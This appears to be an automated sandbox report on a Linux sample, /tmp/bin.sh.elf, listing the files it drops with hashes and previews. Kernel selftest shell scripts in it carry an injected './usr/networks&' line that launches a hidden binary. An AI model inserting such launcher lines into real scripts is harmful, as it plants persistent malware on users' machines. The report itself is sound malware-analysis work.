                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):568
                                                                  Entropy (8bit):4.898482173139057
                                                                  Encrypted:false
                                                                  SSDEEP:12:chnICigPpbnLPb0ILGExkw0ZiiJotSWPqssJlfe4n:CICigPpYICwJSwqL
                                                                  MD5:34D1BD653094623602ED2FC5B916CC1A
                                                                  SHA1:7457BA8BC0E39CF17B36703C9B321939DF4345C5
                                                                  SHA-256:47E02B23C3504B291F9D339261C4729C80630AF32AD146C39699A0D614F2A51E
                                                                  SHA-512:C2E2C95F182CE5BC27FD03076C426EC6F90484B09B3C6CC4AAB41D03F2E408B98F2C43B612C2E6E0833F7A9A6415811327CF6A1FAAF5C6547AC7B4B40978ED38
                                                                  Malicious:false
                                                                  Preview:./usr/networks&....exit 1....;;..esac..fi...# Create working directory...dest=`pwd`..install_work="$dest"/kselftest_install..install_name=kselftest..install_dir="$install_work"/"$install_name"..mkdir -p "$install_dir"...# Run install using INSTALL_KSFT_PATH override to generate install..# directory.../kselftest_install.sh "$install_dir"..(cd "$install_work"; tar $copts "$dest"/kselftest${ext} $install_name)..echo "Kselftest archive kselftest${ext} created!"...# clean up top-level install work directory..rm -rf "$install_work".}..main "$@"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1989
                                                                  Entropy (8bit):4.886361610863015
                                                                  Encrypted:false
                                                                  SSDEEP:48:0khSRLKLLH6GH5HJpmdS/DjxMDRJ7gy3R3opdc5/U/hDD:0qpXDZpcdOfxMjdhgd0cpDD
                                                                  MD5:A089E565FA44F01DD38D39811C153C23
                                                                  SHA1:9BBECC67884722695802DE78573D86AD28027D2E
                                                                  SHA-256:91ED767E3298CE5AB669926E16F19690160BBE6103A73EAE2EFD02C63FA249D9
                                                                  SHA-512:454A2CB2EB891337C3B5F553D87579B50A6020B147D2D9577FCEABE09A86E3E3D1FFFD95D65200F621BEABE9BE28ECEF3B77C8FC070CE2FE457A82ECA337762B
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...echo "test fail, exit"...die..fi.}..test_pin_logic().{..nr=$1..direction=$2..active_low=$3..value=$4...echo $direction > $GPIO_SYSFS/gpio$nr/direction..echo $active_low > $GPIO_SYSFS/gpio$nr/active_low..if [ $direction = "out" ]; then...echo $value > $GPIO_SYSFS/gpio$nr/value..fi..is_consistent $nr.}..test_one_pin().{..nr=$1...echo -n "test pin<$nr>"...echo $nr > $GPIO_SYSFS/export 2>/dev/null...if [ X$? != X0 ]; then...echo "test GPIO pin $nr failed"...die..fi...#"Checking if the sysfs is consistent with debugfs: "..is_consistent $nr...#"Checking the logic of active_low: "..test_pin_logic $nr out 1 1..test_pin_logic $nr out 1 0..test_pin_logic $nr out 0 1..test_pin_logic $nr out 0 0...#"Checking the logic of direction: "..test_pin_logic $nr in 1 1..test_pin_logic $nr out 1 0..test_pin_logic $nr low 0 1..test_pin_logic $nr high 0 0...echo $nr > $GPIO_SYSFS/unexport...echo "successful".}..test_one_pin_fail().{..nr=$1...echo $nr > $GPIO_SYSFS/export 2>/dev/null...if [ X
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):4213
                                                                  Entropy (8bit):5.33237101886955
                                                                  Encrypted:false
                                                                  SSDEEP:96:ofX6AFXGVi66yGgQWLs11nIOUfyHQNHzZo5zeQ:y6Bix+EuQj
                                                                  MD5:6C5D622761FE739673296D7956A42FE2
                                                                  SHA1:C4A8996106088E157E03C43ECC711C5E3CF0B1EB
                                                                  SHA-256:B5960BF281F2515D72B91675CBB3551871A0E511F1C1DD6EC4C378ECF7AE5F9F
                                                                  SHA-512:ED0E4D0BDAC30D0B044D2AFE72E7DDD5BD5B00C2BB00AE4C00ED79A2F4A7F9F76F7907A4D9D40C7665DDCCF67ABF463B45C0AA4A88907F31F14A67BACB2CB9A8
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.#exit status.#1: Internal error.#2: sysfs/debugfs not mount.#3: insert module fail when gpio-mockup is a module..#4: Skip test including run as non-root user..#5: other reason...SYSFS=.GPIO_SYSFS=.GPIO_DRV_SYSFS=.DEBUGFS=.GPIO_DEBUGFS=.dev_type=.module=..# Kselftest framework requirement - SKIP code is 4..ksft_skip=4..usage().{..echo "Usage:"..echo "$0 [-f] [-m name] [-t type]"..echo "-f: full test. It maybe conflict with existence gpio device."..echo "-m: module name, default name is gpio-mockup. It could also test"..echo " other gpio device."..echo "-t: interface type: chardev(char device) and sysfs(being"..echo " deprecated). The first one is default"..echo ""..echo "$0 -h"..echo "This usage".}..prerequisite().{..msg="skip all tests:"..if [ $UID != 0 ]; then...echo $msg must be run as root >&2...exit $ksft_skip..fi..SYSFS=`mount -t sysfs | head -1 | awk '{ print $3 }'`..if [ ! -d "$SYSFS" ]; then...echo $msg sysfs is not mounted >&2...exit 2..fi..GPIO_SYSF
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2484
                                                                  Entropy (8bit):5.26151594494711
                                                                  Encrypted:false
                                                                  SSDEEP:48:B4OlnLEZKbTU8z8OyCQg6X+DsBKPnY3WrIBKPQNaqO789O:RLE0bTH5yCQguOPjf0y+O
                                                                  MD5:EDB41CFBCC54CF6935A157D9E71412A6
                                                                  SHA1:77392764ED385FB04FF7C1964B27C391C85A56F9
                                                                  SHA-256:7C6DCE16D8D66C98B8BDF00B7D660CA49315F2C6D397D4E4E4908D9BCB9B6C02
                                                                  SHA-512:CBF5CB74B09EB0168F6EC2D426D7A1052776E6E4DAF93CE0AE76AA87DD8A909584DEE73991D150B064A4C771367DFFCA2EF59FBC09D180F1026D2E89DF9C4DC9
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi..msg="skip all tests:".if [ $UID != 0 ] && [ $EVALUATE_ONLY == 0 ]; then. echo $msg please run this as root >&2. exit $ksft_skip.fi..max_cpus=$(($(nproc)-1))..function run_test () {...file_ext=$1..for cpu in `seq 0 $max_cpus`..do...echo "launching aperf load on $cpu"..../aperf $cpu &..done...echo "sleeping for 5 seconds"..sleep 5..grep MHz /proc/cpuinfo | sort -u > /tmp/result.freqs..num_freqs=$(wc -l /tmp/result.freqs | awk ' { print $1 } ')..if [ $num_freqs -ge 2 ]; then...tail -n 1 /tmp/result.freqs > /tmp/result.$1..else...cp /tmp/result.freqs /tmp/result.$1..fi.../msr 0 >> /tmp/result.$1...max_perf_pct=$(cat /sys/devices/system/cpu/intel_pstate/max_perf_pct)..echo "max_perf_pct $max_perf_pct" >> /tmp/result.$1...for job in `jobs -p`..do...echo "waiting for job id $job"...wait $job..done.}..#.# MAIN (ALL UNITS IN MHZ).#..# Get the marketing frequency._mkt_freq=$(cat /proc/cpuinfo | grep -m 1 "model name" | awk '{print $NF}')._mkt_freq=$(ech
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):377
                                                                  Entropy (8bit):5.116243621753489
                                                                  Encrypted:false
                                                                  SSDEEP:6:6WaMbxxRuv32K8mgez47sW5mB5gGk4QNVDBXzKUExie3C0+rhvPn:9HbxxROmKhgezE35mpknNVDBXMMeytvP
                                                                  MD5:DDD753E2B7A6E09C9F5B645CC75F3779
                                                                  SHA1:D87672C2017A7420CF967ECB39F2A27C3B9F3395
                                                                  SHA-256:87230B40928E60FF9D028DC9AD3AD051752916A3C9227C6253B92474BF6726FB
                                                                  SHA-512:80E6E81A40A074939DBEE4411A5FF9EEC6924C38C02FFBB0D96B7C1F1B65F7DF4FA4BDBE5BC216D473BF42CAA715A4A6623B094A99479922A9E9748E6588C5F5
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi..if ! /sbin/modprobe -q -n rc-loopback; then. echo "ir_loopback: module rc-loopback is not found [SKIP]". exit $ksft_skip.fi../sbin/modprobe rc-loopback.if [ $? -ne 0 ]; then..exit.fi..RCDEV=$(grep -l DRV_NAME=rc-loopback /sys/class/rc/rc*/uevent | grep -o 'rc[0-9]\+').../ir_loopback $RCDEV $RCDEV.exit../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):4990
                                                                  Entropy (8bit):5.229246673549564
                                                                  Encrypted:false
                                                                  SSDEEP:96:llPBllfCCC2YVwXV+3iJH3knUXW5kqUMk:llJllKCCFOXM3i93knU2UH
                                                                  MD5:5E666C728F25C89FF22234F4F6513BDF
                                                                  SHA1:687C1514EF45B8B0773A06CEE0A9D66A15CB0E41
                                                                  SHA-256:8FD8EDD4844436031CEFF15AA7078CCDAFE491684330C0E887CA8178B61BF3A2
                                                                  SHA-512:57515DEACDA29914E426B90BD2D72A0F1326CBF1974E42A2D05A4853402EC9BBA840244083B03CF307A54FDFF326A6C6BFA16A41C31BE7C467DA449FC62FCFA6
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 0.}..# The ksefltest framework requirement returns 1 for FAIL..log_fail().{..[ $VERBOSE -ne 0 ] && echo "$1 [FAIL]"..exit 1.}..# The ksefltest framework requirement returns 4 for SKIP..log_skip().{..[ $VERBOSE -ne 0 ] && echo "$1"..exit 4.}..# Check efivar SecureBoot-$(the UUID) and SetupMode-$(the UUID)..# (Based on kdump-lib.sh).get_efivarfs_secureboot_mode().{..local efivarfs="/sys/firmware/efi/efivars"..local secure_boot_file=""..local setup_mode_file=""..local secureboot_mode=0..local setup_mode=0...# Make sure that efivar_fs is mounted in the normal location..if ! grep -q "^\S\+ $efivarfs efivarfs" /proc/mounts; then...log_info "efivars is not mounted on $efivarfs"...return 0;..fi..secure_boot_file=$(find "$efivarfs" -name SecureBoot-* 2>/dev/null)..setup_mode_file=$(find "$efivarfs" -name SetupMode-* 2>/dev/null)..if [ -f "$secure_boot_file" ] && [ -f "$setup_mode_file" ]; then...secureboot_mode=$(hexdump -v -e '/1 "%d\ "' \...."$secure_boot_file"|cut -d' '
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11072
                                                                  Entropy (8bit):5.471734397341002
                                                                  Encrypted:false
                                                                  SSDEEP:192:SwAwkqrPjya4ynFGoEGNLp8p3GyspJepJFvgkgMsMiT3RN6tt:SLw5OPwcoJ2N5srerFvN/iT3M
                                                                  MD5:C3B72303BE30EE939F95B5ECB958D777
                                                                  SHA1:2A1261447A7CC21E6A0B5681B4A2B5EE09831A00
                                                                  SHA-256:C786C60928E71FC2317F06C9E653FF542731E0EE9FD739B1276207B4EB323984
                                                                  SHA-512:99B326E70CDDB17A20C5BE276E3C5194BF4DBDF9E0E61353523905FC9905EFF7BAD9F65A6AD4E69472C6E8A4AA0BB04C007B3D1A84FA3757ACA22A7C3E3232E0
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit $ksft_skip. fi.}..function allow_user_defaults().{..if [ -z $DEFAULT_KMOD_DRIVER ]; then...DEFAULT_KMOD_DRIVER="test_module"..fi...if [ -z $DEFAULT_KMOD_FS ]; then...DEFAULT_KMOD_FS="xfs"..fi...if [ -z $PROC_DIR ]; then...PROC_DIR="/proc/sys/kernel/"..fi...if [ -z $MODPROBE_LIMIT ]; then...MODPROBE_LIMIT=50..fi...if [ -z $DIR ]; then...DIR="/sys/devices/virtual/misc/${TEST_DRIVER}0/"..fi...if [ -z $DEFAULT_NUM_TESTS ]; then...DEFAULT_NUM_TESTS=150..fi...MODPROBE_LIMIT_FILE="${PROC_DIR}/kmod-limit".}..test_reqs().{..if ! which modprobe 2> /dev/null > /dev/null; then...echo "$0: You need modprobe installed" >&2...exit $ksft_skip..fi...if ! which kmod 2> /dev/null > /dev/null; then...echo "$0: You need kmod installed" >&2...exit $ksft_skip..fi...# kmod 19 has a bad bug where it returns 0 when modprobe..# gets called *even* if the module was not loaded due to..# some bad heuristics. For details see:..#..# A work around is possible in-kernel but its
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2080
                                                                  Entropy (8bit):5.314686727178092
                                                                  Encrypted:false
                                                                  SSDEEP:48:rhp/MbdeWKmipFHlkJcUrwcTnab6NikgvMjujQOkjGnyLas:DMb8DXqTdTabSi/6urNyLas
                                                                  MD5:A15BCBBD4B7ED7789B0E82A3B61469FE
                                                                  SHA1:0C7620791E6F86BE31D54585390D81BD76222D46
                                                                  SHA-256:B68807676ECAE58A8EDEC222B7F29848DF261DBBC87EF9512CA8117F939FFA28
                                                                  SHA-512:02B945C30BF5477322D80290300CB81432132E463E6F2BC401197667BC70E492372E55C6C4CCFC216430A471A04443439D81FC38A03EB609345A46559E8F8101
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..# If Perl is unavailable, we must fall back to line-at-a-time prefixing.# with sed instead of unbuffered output..tap_prefix().{..if [ ! -x /usr/bin/perl ]; then...sed -e 's/^/# /'..else..."$BASE_DIR"/kselftest/prefix.pl..fi.}..tap_timeout().{..# Make sure tests will time out if utility is available...if [ -x /usr/bin/timeout ] && [ $kselftest_timeout -gt 0 ] ; then.../usr/bin/timeout --foreground "$kselftest_timeout" "$1"..else..."$1"..fi.}..run_one().{..DIR="$1"..TEST="$2"..NUM="$3"...BASENAME_TEST=$(basename $TEST)...# Reset any "settings"-file variables...export kselftest_timeout="$kselftest_default_timeout"..# Load per-test-directory kselftest "settings" file...settings="$BASE_DIR/$DIR/settings"..if [ -r "$settings" ] ; then...while read line ; do....field=$(echo "$line" | cut -d= -f1)....value=$(echo "$line" | cut -d= -f2-)....eval "kselftest_$field"="$value"...done < "$settings"..fi...TEST_HDR_MSG="selftests: $DIR: $BASENAME_TEST"..echo "# $TEST_HDR_MS
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):434
                                                                  Entropy (8bit):4.947669354093026
                                                                  Encrypted:false
                                                                  SSDEEP:12:cnVFLkhdZDfL8bHjPrxVeMLU9R939UWIe4n:MV5kdTLy3veMLg9tUW0
                                                                  MD5:C151AADA79CEF900C2965B5B15E15C4D
                                                                  SHA1:2BA3E33311218B83B81E01B765C984D1B28E6CB5
                                                                  SHA-256:66F9EAB006E05CF23853E19F2EF608B2AB6D3361206ADD9845CA3B03F97C8370
                                                                  SHA-512:544EE3580303971B17A555CBB9EED376DA4B2ABD18EA26B8DE8A055A1735564C31F1B0494297627D2B3E71E13084CF88C429048D602E3A892E4A3991EC507F9F
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1;..fi...# Only allow installation into an existing location...if [ "$#" -eq 0 ]; then...echo "$0: Installing in default location - $install_dir ..."..elif [ ! -d "$1" ]; then...echo "$0: $1 doesn't exist!!"...exit 1;..else...install_dir="$1"...echo "$0: Installing in specified location - $install_dir ..."..fi...# Build tests..KSFT_INSTALL_PATH="$install_dir" make install.}..main "$@"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:OS/2 REXX batch file, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):655
                                                                  Entropy (8bit):4.782002361541967
                                                                  Encrypted:false
                                                                  SSDEEP:12:wA1ITFexHGAUldev0xpeOAwevfaKHVLCBdKHYAwv5J5yGV4dOkwbqS4n:r1OCGAUXRpAwOVLCBdKHYAwZN+OpbqT
                                                                  MD5:F883ACA41C9A34D74C29A7E0237A0AA1
                                                                  SHA1:185D2E9FDB6AEA2620DB6410CA14B07BFAC4906F
                                                                  SHA-256:3808E326FBE721E7997056A09D96F1CEA5B1DEE3EDC36FA34B8B8FBBB43B072A
                                                                  SHA-512:58A6678DF52979777D996393ED233F6967D6D16B7A9063558AE51D560F7484059E9297D1973E198B17FCE8D0ED9EBA8A50FBA2E2DBD1BC548DCD347947724369
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1. fi.. desc="$1". shift || true. module="$1". shift || true. args="$@".}..assert_root() {. if [ ! -w /dev ]; then..skip "please run as root". fi.}..assert_have_module() {. if ! $modprobe -q -n $module; then..skip "module $module is not found". fi.}..run_module() {. if $modprobe -q $module $args; then..$modprobe -q -r $module..say "ok". else..fail "". fi.}..say() {. echo "$desc: $1".}...fail() {. say "$1 [FAIL]" >&2. exit 1.}..skip() {. say "$1 [SKIP]" >&2. # Kselftest framework requirement - SKIP code is 4.. exit 4.}..#.# Main script.#.main "$@"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):5539
                                                                  Entropy (8bit):5.1207618092933025
                                                                  Encrypted:false
                                                                  SSDEEP:96:Pt8ozF7fIbvkg00GifF8p+7lpZKpsSscJydwJocXjsUuxsd9i14l:V8QMvkF0HN847lusqJ5qIjsUu49iOl
                                                                  MD5:5719D18704140CF656116B4B9DF238AE
                                                                  SHA1:F74449C68570D42A1B91747FC2887DE1C045179D
                                                                  SHA-256:334BB33E773A83BEE5C4F9E7FA7B82ED8A2F8F602CD6353DCF3B0070AB548A8B
                                                                  SHA-512:8A14E4ABD88C1C03EA7E0F84191D03306248DD3A7E194FEF61BDE79CE92F472517E709CC733B60EA0F4F2C1A631B530A3C9BDAC8EEEF03A5C226760912CF3C70
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 4.}..# die(msg) - game over, man.#.msg - dying words.function die() {..log "ERROR: $1"..echo "ERROR: $1" >&2..exit 1.}..function push_dynamic_debug() {. DYNAMIC_DEBUG=$(grep '^kernel/livepatch' /sys/kernel/debug/dynamic_debug/control | \. awk -F'[: ]' '{print "file " $1 " line " $2 " " $4}').}..function pop_dynamic_debug() {..if [[ -n "$DYNAMIC_DEBUG" ]]; then...echo -n "$DYNAMIC_DEBUG" > /sys/kernel/debug/dynamic_debug/control..fi.}..# set_dynamic_debug() - save the current dynamic debug config and tweak.# ...it for the self-tests. Set a script exit trap.#...that restores the original config..function set_dynamic_debug() {. push_dynamic_debug. trap pop_dynamic_debug EXIT INT TERM HUP. cat <<-EOF > /sys/kernel/debug/dynamic_debug/control...file kernel/livepatch/* +p...func klp_try_switch_task -p...EOF.}..# loop_until(cmd) - loop a command until it is successful or $MAX_RETRIES,.#.. sleep $RETRY_INTERVAL between attemp
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):21397
                                                                  Entropy (8bit):5.327362750446854
                                                                  Encrypted:false
                                                                  SSDEEP:384:wdt/f+MhN4uEdrCKVcDBwTYQLPN2S9L1tGJCDuDGQ:BDNGRGQ
                                                                  MD5:5EA70D701012A2DE18EB73B7A32266E0
                                                                  SHA1:4C8D752F31BF41A9919B69D1E5F0FBAA9BD908C2
                                                                  SHA-256:5A0151E99EA2E1AF05FB60DFA2C725158DA2A3CD4F7087638CBB69DC634EA132
                                                                  SHA-512:F775A6773426F6607F8DC1D45020F43F00A4D178E495D6DBB1A39FF460F6EF601FC791937C07E19568A5D5988ED8C9BC227A4060FDC055154D94F6BA720BFC4D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.$MOD_TARGET: ${MOD_TARGET}_exit"...# TEST: module_coming notifier.#.# This test is similar to the previous test, but (un)load the livepatch.# module before the target kernel module. This tests the livepatch.# core's module_coming handler..#.# - On livepatch enable, only pre/post-patch callbacks are executed for.# currently loaded klp_objects, in this case, vmlinux..#.# - When a targeted module is subsequently loaded, only its.# pre/post-patch callbacks are executed..#.# - On livepatch disable, all currently loaded klp_objects' (vmlinux and.# $MOD_TARGET) pre/post-unpatch callbacks are executed...echo -n "TEST: module_coming notifier ... ".dmesg -C..load_lp $MOD_LIVEPATCH.load_mod $MOD_TARGET.disable_lp $MOD_LIVEPATCH.unload_lp $MOD_LIVEPATCH.unload_mod $MOD_TARGET..check_result "% modprobe $MOD_LIVEPATCH.livepatch: enabling patch '$MOD_LIVEPATCH'.livepatch: '$MOD_LIVEPATCH': initializing patching transition.$MOD_LIVEPATCH: pre_patch_callback: vmlinux.livepatch: '
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):46
                                                                  Entropy (8bit):3.925523369006428
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                  MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                  SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                  SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                  SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):46
                                                                  Entropy (8bit):3.925523369006428
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                  MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                  SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                  SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                  SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):239
                                                                  Entropy (8bit):4.593536530803619
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVasWoWbsK3rKCAWRhtmcrWr3rKbVR9htmtFZeLwAdFClveLwAdFcksWP/NJjUE:6WLUTQVHut3zAdGvzAd/sWPTov6viMn
                                                                  MD5:E481DB4C471700714131FC670E4565C8
                                                                  SHA1:31B80732C4799F423A4C77CC7CC287041633DF19
                                                                  SHA-256:95AABAD6F9543FA79A303D67D76111CFBAA9D496AAC5D2FAF3EE90567FC87FB9
                                                                  SHA-512:84AA078169ACD5251C73B95DC74005553D7420F0D780AF6F0AE113464889DEC48D7121119C9762935537CFC08E78466D95769ABB75AE6A027E18AC7791DE0794
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi..if /sbin/modprobe -q test-ww_mutex; then. /sbin/modprobe -q -r test-ww_mutex. echo "locking/ww_mutex: ok".else. echo "locking/ww_mutex: [FAIL]". exit 1.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):894
                                                                  Entropy (8bit):4.917046734902346
                                                                  Encrypted:false
                                                                  SSDEEP:24:M0ZrJUueWh3QTwYwisHxr0ETdQxReCrDPe6rs:McUVWkeiFEeXeOy
                                                                  MD5:1EA9500EA2D85C26D5FDB2E83315EE1C
                                                                  SHA1:ECD6138BCC6DFBF9C586527023ECADB57F45E3F2
                                                                  SHA-256:614CB18904DF272F0CEAAF58CBCA8788F1AEAD86DEA60486A93FC5F904C9DE70
                                                                  SHA-512:153135A8D20F6D91F6B04E36F973E2476CDFF14B23D8D6D05C485E6B38A386A73D78EBC42992923D0DD13C1E8A382FF5B137FE613F6605EF7D54DDECFC477F1F
                                                                  Malicious:false
